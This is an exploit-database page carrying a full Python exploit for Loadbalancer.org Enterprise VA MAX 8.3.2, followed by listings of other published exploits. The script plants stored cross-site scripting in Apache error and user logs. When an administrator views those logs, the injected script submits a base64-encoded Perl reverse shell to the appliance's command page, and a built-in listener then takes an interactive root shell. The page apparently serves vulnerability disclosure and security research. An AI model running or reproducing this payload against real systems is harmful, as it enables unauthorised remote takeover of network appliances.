Menu

Search for hundreds of thousands of exploits

"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution"

Author

Exploit author

"Jakub Palaczynski"

Platform

Exploit platform

php

Release date

Exploit published date

2018-10-31

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
# Exploit Title: Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution
# Date: 2018-07-24
# Exploit Authors: Jakub Palaczynski
# Vendor Homepage: https://www.loadbalancer.org/
# Version: <= 8.3.2
# CVE: N/A

# Exploit Description: Loadbalancer.org Enterprise VA MAX - Remote Code Execution via Unauthenticated Stored XSS
# Info: It is advised to use HTTPS port instead of HTTP for sending payloads as storing JavaScript in "Apache Error Log" does not work for HTTP.
# Info: JavaScript can be easily changed to for example modify SSH configuration or add/modify web users

# Basic Information:
# Two instances of Stored XSS were found - exploit uses both:
# 1. It is possible to inject custom JavaScript code during authentication to "/lbadmin/".
# Application takes input from Basic Auth (username) and stores it without encoding/sanitization/filtering in "Apache Error Log".
# This instance only forks for HTTPS.
# 2. It is possible to inject custom JavaScript code by accessing URL like /?<XSS>.
# Such JavaScript is stored in "Apache User Log".

# This way attacker can store JavaScript code that can for example execute system command as root. This is actually what this exploit does - spawns reverse shell.
# When application user browses "Apache Error Log" or "Apache User Log" custom JavaScript code gets automatically executed.


#!/usr/bin/python

import socket
import sys
import os
import threading
import subprocess
import time
import base64

# print help or assign arguments
if len(sys.argv) != 3:
    sys.stderr.write("[-]Usage: python %s <our_ip:port> <proto://remote_ip:port>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 192.168.1.1:80 https://192.168.1.2:9443\n" % sys.argv[0])
    sys.exit(1)

lhost = sys.argv[1] # our ip address and port
rhost = sys.argv[2] # ip address and port of vulnerable Loadbalancer
raw = """perl -e 'use Socket;$i=\"""" + lhost.split(":")[0] + """\";$p=""" + lhost.split(":")[1] + """;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" # raw reverse shell in perl
payload_url = 'document.getElementById("lb").contentDocument.forms[0].elements["command"].value = "echo ' + base64.b64encode(raw.encode("ascii")) + ' | base64 -d | bash";document.getElementById("lb").contentDocument.forms[0].submit();' # base64 encoded reverse shell in perl
payload_auth = "<iframe id='lb'/src='/lbadmin/config/command.php'/style='width&colon;0;height&colon;0;border&colon;0;border&colon;none;'/onload=eval(atob('" + base64.b64encode(payload_url.encode("ascii")) + "'))></iframe>:pwd" # base64 encoded reverse shell in perl

# for additional thread to send request in parallel
class requests (threading.Thread):
    def run(self):
        time.sleep(5)
	# send requests to trigger vulnerability
	os.system('curl -s -k -m 10 -X "GET" -H "Authorization: Basic ' + base64.b64encode(payload_auth.encode("ascii")) + '" "' + rhost + '/lbadmin/" > /dev/null') # store payload in Apache Error logs
	os.system('curl -s -k -m 10 -X "GET" "' + rhost + '/?<iframe/id=\'lb\'/src=\'/lbadmin/config/command.php\'/onload=\'eval(atob(\`' + base64.b64encode(payload_url.encode("ascii")) + '\`))\'/style=\'width:0;height:0;border:0;border:none;\'></iframe>" > /dev/null') # store payload in Apache User logs

# for additional thread to receive data from socket
class receiving (threading.Thread):
    def __init__(self, conn):
        threading.Thread.__init__(self)
        self.conn = conn
	self._is_running = True
    def stop(self):
	self._is_running = False
    def run(self):
        while (self._is_running):
            cmd = conn.recv(1024)
            sys.stdout.write(cmd)
            sys.stdout.flush()
	    if cmd == '':
		break
	threadr.stop()

# function that creates socket
def create_socket(port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('0.0.0.0', port))
    sock.listen(10)
    conn, addr = sock.accept()
    return sock, conn, addr

# start thread that sends request
print 'Sending requests that triggers vulnerability.'
thread = requests()
thread.start()

# create socket to receive shell
print 'Now you need to wait for shell.'
sock, conn, addr = create_socket(int(lhost.split(":")[1]))
threadr = receiving(conn)
threadr.start()
while True:
    cmd = raw_input("")
    if cmd == 'exit':
	conn.send(cmd + "\n")
        break
    else:
        conn.send(cmd + "\n")
sock.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2020-07-06 "RSA IG&L Aveksa 7.1.1 - Remote Code Execution" webapps multiple "Jakub Palaczynski"
2019-10-07 "CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation" local windows "Jakub Palaczynski"
2019-10-07 "IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload" webapps java "Jakub Palaczynski"
2019-05-21 "Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution" webapps java "Jakub Palaczynski"
2018-11-05 "Royal TS/X - Information Disclosure" webapps json "Jakub Palaczynski"
2018-10-31 "Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution" webapps php "Jakub Palaczynski"
2018-09-17 "CA Release Automation NiMi 6.5 - Remote Command Execution" remote java "Jakub Palaczynski"
2017-12-13 "Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read" webapps cgi "Jakub Palaczynski"
2017-09-13 "Astaro Security Gateway 7 - Remote Code Execution" remote hardware "Jakub Palaczynski"
2016-10-20 "Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection" webapps xml "Jakub Palaczynski"
2015-06-10 "HP WebInspect 10.4 - XML External Entity Injection" webapps xml "Jakub Palaczynski"
2014-12-12 "IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution" webapps jsp "Jakub Palaczynski"
2014-12-10 "Apache James Server 2.3.2 - Remote Command Execution" remote linux "Jakub Palaczynski" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected